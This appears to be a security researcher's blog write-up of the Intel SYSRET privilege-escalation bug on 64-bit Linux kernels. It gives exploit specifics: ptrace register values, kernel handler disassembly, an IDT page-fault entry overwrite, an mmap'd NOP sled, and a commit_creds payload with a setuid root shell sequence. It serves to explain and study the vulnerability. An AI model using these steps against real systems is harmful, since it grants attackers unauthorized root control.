I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug is basically how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all regular registers, segment registers or reflags. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler transferring the execution flow to the NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered.
First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, the SYSRET does the following:
- Load the instruction pointer (
- Change code segment selector to guest mode (this effectively changes the privilege level)
and this is exactly what it does on both Intel and AMD platforms. However, the difference between these two platforms comes to play when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in
%rcx upon executing the SYSRET instruction (since SYSRET loads
%rcx). What is a non-canonical address? There are a few good explanations on the web (e.g., this link). On AMD architectures, the
%rip is not assigned until after the privilege level has been changed back to guest mode (and #GP in user-space is not very interesting). However, on Intel architectures, the #GP fault is thrown in privileged mode (ring0). This also means that the current
%rsp value is used in handling the #GP! Since SYSRET does not restore the
%rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel would have already restored the
%rsp value from the user-space
%rsp. In summary, this means that if we can trigger #GP in SYSRET:
- #GP will execute in privileged mode
- #GP will use the stack pointer supplied by us from user-space
That's great but how do we trigger the #GP fault in the first place? The
%rip address loaded from
%rcx would always be canonical. That's where
ptrace comes into play. If you are not familiar with ptrace, this is a good place to start. In short, that's how debuggers stop a running process and let you change register values on-the-fly. Using ptrace we can change %rip and
%rsp to arbitrary values. Most ptrace paths go via the interface that catches the process using the signal handler which always returns with IRET. However, there are a few paths that can get caught with ptrace_event() instaed of the signal path. Refer to the PoC code for an example of using
ptrace to force such a path.
For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches.
To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using
0x8fffffffffffffff but any non-canonical address would work. The next step is to set the
%rsp value. If we'll set it to a user-space address, we'll simply double fault. However, if we'll set it to a writable address in kernel-space, we can overwrite data on the stack.
Let's take a look at the
general_protection handler that we enter with an arbitrary
0xffffffff8165cba0 <general_protection> data32 xchg %ax,%ax 0xffffffff8165cba3 <general_protection+3> data32 xchg %ax,%ax 0xffffffff8165cba6 <general_protection+6> sub $0x78,%rsp 0xffffffff8165cbaa <general_protection+10> callq 0xffffffff8165cd90 <error_entry>  0xffffffff8165cbaf <general_protection+15> mov %rsp,%rdi 0xffffffff8165cbb2 <general_protection+18> mov 0x78(%rsp),%rsi 0xffffffff8165cbb7 <general_protection+23> movq $0xffffffffffffffff,0x78(%rsp) 0xffffffff8165cbc0 <general_protection+32> callq 0xffffffff8165d040 <do_general_prote  0xffffffff8165cbc5 <general_protection+37> jmpq 0xffffffff8165ce30 <error_exit> 0xffffffff8165cbca nopw 0x0(%rax,%rax,1) ...
When entering the
error_entry at , we overwrite a few entries on the stack (
0xffffffff8165cd8f <error_entry> cld 0xffffffff8165cd91 <error_entry+1> mov %rdi,0x78(%rsp) 0xffffffff8165cd96 <error_entry+6> mov %rsi,0x70(%rsp) 0xffffffff8165cd9b <error_entry+11> mov %rdx,0x68(%rsp) 0xffffffff8165cda0 <error_entry+16> mov %rcx,0x60(%rsp) 0xffffffff8165cda5 <error_entry+21> mov %rax,0x58(%rsp) 0xffffffff8165cdaa <error_entry+26> mov %r8,0x50(%rsp) 0xffffffff8165cdaf <error_entry+31> mov %r9,0x48(%rsp) 0xffffffff8165cdb4 <error_entry+36> mov %r10,0x40(%rsp) 0xffffffff8165cdb9 <error_entry+41> mov %r11,0x38(%rsp) 0xffffffff8165cdbe <error_entry+46> mov %rbx,0x30(%rsp) 0xffffffff8165cdc3 <error_entry+51> mov %rbp,0x28(%rsp) 0xffffffff8165cdc8 <error_entry+56> mov %r12,0x20(%rsp) 0xffffffff8165cdcd <error_entry+61> mov %r13,0x18(%rsp) 0xffffffff8165cdd2 <error_entry+66> mov %r14,0x10(%rsp) 0xffffffff8165cdd7 <error_entry+71> mov %r15,0x8(%rsp) ...
However, we can control all these registers (well, except for
PTRACE_SETREGS (see the PoC for details):
// get current registers ptrace(PTRACE_GETREGS, chld, NULL, &regs); // modify regs ... // set regs ptrace(PTRACE_SETREGS, chld, NULL, &regs);
general_protection handler then invokes the
do_general_protection function at :
Dump of assembler code for function do_general_protection: 0xffffffff8165d040 <+0>: push %rbp 0xffffffff8165d041 <+1>: mov %rsp,%rbp 0xffffffff8165d044 <+4>: sub $0x20,%rsp 0xffffffff8165d048 <+8>: mov %rbx,-0x18(%rbp) 0xffffffff8165d04c <+12>: mov %r12,-0x10(%rbp) 0xffffffff8165d050 <+16>: mov %r13,-0x8(%rbp) 0xffffffff8165d054 <+20>: callq 0xffffffff816647c0 <mcount> 0xffffffff8165d059 <+25>: testb $0x2,0x91(%rdi) 0xffffffff8165d060 <+32>: mov %rdi,%r12 0xffffffff8165d063 <+35>: mov %rsi,%r13 0xffffffff8165d066 <+38>: je 0xffffffff8165d06f <do_general_protection+47> 0xffffffff8165d068 <+40>: callq *0xffffffff81c177d8 0xffffffff8165d06f <+47>: mov %gs:0xc500,%rbx  0xffffffff8165d078 <+56>: testb $0x3,0x88(%r12) 0xffffffff8165d081 <+65>: je 0xffffffff8165d140 <do_general_protection+256> ...
At , the kernel will page fault when accessing
%gs:0xc500, then double fault and crash. The question now is what can we do to prevent the kernel from crashing and possibly transfer execution flow to our mapped memory region in user-space? Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space:
trampoline = mmap(0x80000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0,0);
We then set our
regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + address of the #PF handler (14th entry where each entry is 16 bytes) + 8 bytes (we need to overwrite offset 32..63 in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure.
In the PoC code, the
%rdi value (which is set to 0,
regs.rdi = 0x0000000000000000) will overwrite the offset 32..63 in the #PF entry leaving us with a memory address that points to user-space. On my test VM, this address is
0x8165cbd0 which is why we've mapped our user-space memory region at
I should point out that it's important to
MAP_POPULATE when mapping this memory region so we don't trigger #PF on accessing our mapped user-space address, i.e., #PF with trigger a double fault in this case. Here's the excerpt from the mmap(2) man page:
MAP_POPULATE (since Linux 2.5.46) Populate (prefault) page tables for a mapping. For a file mapping, this causes read-ahead on the file. Later accesses to the mapping will not be blocked by page faults. MAP_POPULATE is supported for private mappings only since Linux 2.6.23.
Once the #PF is triggered, we'll land to our NOP sled. However, by that time, the IDT will be trashed. We've overwritten a few entries in the IDT including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (
rdx, etc) to the original values:
regs.rdi = 0x0000000000000000; regs.rsi = 0x81658e000010cbd0; regs.rdx = 0x00000000ffffffff; regs.rcx = 0x81658e000010cba0; regs.rax = 0x00000000ffffffff; regs.r8 = 0x81658e010010cb00; regs.r9 = 0x00000000ffffffff; regs.r10 = 0x81668e0000106b10; regs.r11 = 0x00000000ffffffff; regs.rbx = 0x81668e0000106ac0; regs.rbp = 0x00000000ffffffff; regs.r12 = 0x81668e0000106ac0; regs.r13 = 0x00000000ffffffff; regs.r14 = 0x81668e0200106a90; regs.r15 = 0x00000000ffffffff;
This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine
commit_creds(prepare_kernel_cred(NULL)), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice.
There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects the kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. There are other kernel structs that can be overwriten that would give us a more reliable (and somewhat more universal) way of exploitation.